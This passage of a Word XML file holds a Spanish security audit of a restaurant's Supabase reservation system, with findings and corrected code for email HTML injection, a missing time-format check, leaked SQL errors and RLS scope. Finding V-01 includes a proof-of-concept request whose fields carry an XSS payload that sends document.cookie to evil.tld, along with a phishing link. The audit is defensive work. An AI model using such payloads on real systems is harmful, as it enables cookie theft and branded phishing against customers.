          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4C6E3E"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Bajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">2.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SEO — URLs canónicas apuntan al dominio antiguo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4406"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">canonical, hreflang, Open Graph, sitemap.xml y robots.txt apuntan a mesoncafeteriadeeiffel.es, dominio que hoy NO aloja este sitio (vive en eiffel-meson.netlify.app). Es intencional y ya acordado: no tocar hasta que se apruebe la migración de dominio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4C6E3E"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Informativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Pendiente (no acción ahora)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Mantenibilidad — headers duplicados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4406"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Las cabeceras de seguridad/caché están repetidas literalmente en netlify.toml y en Messon_Eiffel/_headers (necesario para deploys manuales). Riesgo de que diverjan si se edita solo uno de los dos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4C6E3E"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Bajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hallazgos detallados y código corregido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V-01 · Inyección HTML en las plantillas de email (Alto — CVSS 7.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riesgo: un atacante llama directamente a la REST API pública de Supabase (la anon key es, por diseño, visible en el cliente) e inserta una reserva con:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">POST https://&lt;proyecto&gt;.supabase.co/rest/v1/reservas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "nombre": "&lt;img src=x onerror=fetch('https://evil.tld/'+document.cookie)&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "telefono": "000000000",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "email": "victima@ejemplo.com",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "fecha": "2026-08-01",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "hora": "&lt;a href=https://evil.tld&gt;Ver aquí&lt;/a&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "personas": 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">El Database Webhook dispara confirmar-reserva, que interpola r.nombre y r.hora sin escapar (index.ts, líneas 114 y 118). El correo llega a victima@ejemplo.com con el HTML inyectado, firmado por el dominio verificado del restaurante en Resend. La probabilidad de explotación real hoy es baja (el sitio aún no tiene tráfico público ni está anunciado), pero el impacto es alto: es un vector de phishing con marca ajena legítima, y el parche cuesta dos líneas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impacto: confidencialidad no comprometida directamente; integridad/reputación sí — el atacante controla contenido HTML servido desde una fuente de confianza (el propio dominio del restaurante en Resend) hacia víctimas arbitrarias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Solución — función de escape reutilizable en ambas Edge Functions (confirmar-reserva/index.ts y recordatorio-reserva/index.ts):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">function escHtml(s: string): string {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  return String(s)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    .replace(/&amp;/g, '&amp;amp;')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    .replace(/&lt;/g, '&amp;lt;')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    .replace(/&gt;/g, '&amp;gt;')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    .replace(/"/g, '&amp;quot;')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    .replace(/'/g, '&amp;#39;');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// En plantillaHtml(), sustituir las interpolaciones directas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;p&gt;${t.hola(escHtml(r.nombre.split(' ')[0]))}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;tr&gt;&lt;td&gt;...&lt;/td&gt;&lt;td&gt;${escHtml(r.hora)}&lt;/td&gt;&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B5C4E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(personas es INT y fecha se formatea con toLocaleDateString a partir de un DATE — ninguno de los dos acepta HTML libre, no necesitan escape, pero conviene escapar por defecto cualquier campo TEXT que entre en una plantilla HTML, presente o futuro.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V-02 · Falta de CHECK de formato en reservas.hora (Medio — CVSS 5.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Es el habilitador técnico de V-01: nombre/telefono/email/notas ya están acotados en longitud desde la migración de endurecimiento (10-jul), pero hora no tiene ningún CHECK. Nueva migración recomendada:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-- 20260722000000_check_formato_hora.sql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE reservas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADD CONSTRAINT reservas_hora_formato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    CHECK (hora ~ '^([01][0-9]|2[0-3]):[0-5][0-9]$') NOT VALID;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V-03 · SQLERRM sin filtrar en modificar_reserva_token (Bajo — CVSS 4.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El bloque EXCEPTION WHEN OTHERS devuelve SQLERRM tal cual al cliente. Sustituir por un código genérico y loguear el detalle solo en servidor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">EXCEPTION WHEN OTHERS THEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  RAISE WARNING 'modificar_reserva_token error: %', SQLERRM;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN QUERY SELECT false, 'ERROR_INTERNO'::TEXT;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2EDE6" w:val="clear"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A110A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">END;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V-04 · RLS por "autenticado", no por rol admin (Bajo — CVSS 2.7)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
